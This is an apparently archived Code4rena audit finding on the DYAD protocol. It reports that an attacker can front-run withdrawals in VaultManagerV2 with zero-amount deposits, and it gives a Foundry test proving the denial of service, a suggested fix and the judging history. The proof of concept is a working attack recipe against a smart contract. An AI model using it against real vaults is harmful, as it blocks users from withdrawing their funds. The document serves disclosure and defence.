Platform: Code4rena
Start Date: 18/04/2024
Pot Size: $36,500 USDC
Total HM: 19
Participants: 183
Period: 7 days
Judge: Koolex
Id: 367
League: ETH
Rank: 170/183
Findings: 1
Award: $0.02
🌟 Selected for report: 0
🚀 Solo Findings: 0
🌟 Selected for report: MrPotatoMagic
Also found by: 0x175, 0x486776, 0x77, 0xAkira, 0xAsen, 0xDemon, 0xabhay, 0xblack_bird, 0xlemon, 0xloscar01, 0xtankr, 3docSec, 4rdiii, Abdessamed, AlexCzm, Angry_Mustache_Man, BiasedMerc, Circolors, Cryptor, DMoore, DPS, DedOhWale, Dinesh11G, Dots, GalloDaSballo, Giorgio, Honour, Imp, Jorgect, Krace, KupiaSec, Mrxstrange, NentoR, Pechenite, PoeAudits, Ryonen, SBSecurity, Sabit, T1MOH, TheFabled, TheSavageTeddy, Tychai0s, VAD37, Vasquez, WildSniper, ZanyBonzy, adam-idarrha, alix40, asui, blutorque, btk, c0pp3rscr3w3r, caglankaan, carrotsmuggler, d_tony7470, dimulski, dinkras, djxploit, falconhoof, forgebyola, grearlake, imare, itsabinashb, josephdara, kartik_giri_47538, ke1caM, kennedy1030, koo, lionking927, ljj, niser93, pep7siup, poslednaya, ptsanev, sashik_eth, shaflow2, steadyman, turvy_fuzz, ubl4nk, valentin_s2304, web3km, xyz, y4y, zhaojohnson, zigtur
0.0234 USDC - $0.02
https://github.com/code-423n4/2024-04-dyad/blob/cd48c684a58158de444b24854ffd8f07d046c31b/src/core/VaultManagerV2.sol#L119-L131 https://github.com/code-423n4/2024-04-dyad/blob/cd48c684a58158de444b24854ffd8f07d046c31b/src/core/VaultManagerV2.sol#L134-L153
VaultManagerV2.withdraw will revert on same block deposit and withdraw operations, using idToBlockOfLastDeposit[id] == block.number check.
However, attacker can frontrun any user's withdraw call with a zero amount of deposit to the same dNFT and vault, and set idToBlockOfLastDeposit[id] to the same block with user's withdraw call, which will lead to user's withdraw call always fail.
To summary up, attacker can disable the core function VaultManagerV2.withdraw with only GAS fee.
Attacker can front run withdraw call with zero amount deposit call to revert it, see below test code.
function test_zero() public { address attacker = address(0xABC); address alice = address(0x123); uint id = dNft.mintNft{value: 1 ether}(alice); vm.startPrank(alice); vaultManager.add(id, address(wethVault)); uint alice_amt = 1e18; weth.mint(alice, alice_amt); vm.roll(1000); weth.approve(address(vaultManager), alice_amt); vaultManager.deposit(id, address(wethVault), alice_amt); assertEq(1000, vaultManager.idToBlockOfLastDeposit(id)); vm.stopPrank(); vm.roll(2000); // @audit: attacker listen to mempool and found out that alice is trying to withdraw vm.startPrank(attacker); uint zero_amt = 0; // @audit: attacker trigger a zero amount deposit vaultManager.deposit(id, address(wethVault), zero_amt); assertEq(2000, vaultManager.idToBlockOfLastDeposit(id)); vm.stopPrank(); vm.startPrank(alice); // @audit: alice failed to withdraw vm.expectRevert(IVaultManager.DepositedInSameBlock.selector); vaultManager.withdraw(id, address(wethVault), alice_amt, alice); vm.stopPrank(); }
Manual Review and Foundry
Add minimal deposit amount check
DoS
#0 - c4-pre-sort
2024-04-27T11:38:42Z
JustDravee marked the issue as duplicate of #1103
#1 - c4-pre-sort
2024-04-27T11:45:37Z
JustDravee marked the issue as duplicate of #489
#2 - c4-pre-sort
2024-04-29T09:25:36Z
JustDravee marked the issue as sufficient quality report
#3 - c4-judge
2024-05-05T20:38:17Z
koolexcrypto marked the issue as unsatisfactory: Invalid
#4 - c4-judge
2024-05-05T20:39:23Z
koolexcrypto marked the issue as unsatisfactory: Invalid
#5 - c4-judge
2024-05-05T20:39:26Z
koolexcrypto marked the issue as unsatisfactory: Invalid
#6 - c4-judge
2024-05-05T21:37:29Z
koolexcrypto marked the issue as nullified
#7 - c4-judge
2024-05-05T21:37:32Z
koolexcrypto marked the issue as not nullified
#8 - c4-judge
2024-05-08T15:28:02Z
koolexcrypto marked the issue as duplicate of #1001
#9 - c4-judge
2024-05-11T19:50:02Z
koolexcrypto marked the issue as satisfactory
#10 - c4-judge
2024-05-13T18:34:30Z
koolexcrypto changed the severity to 3 (High Risk)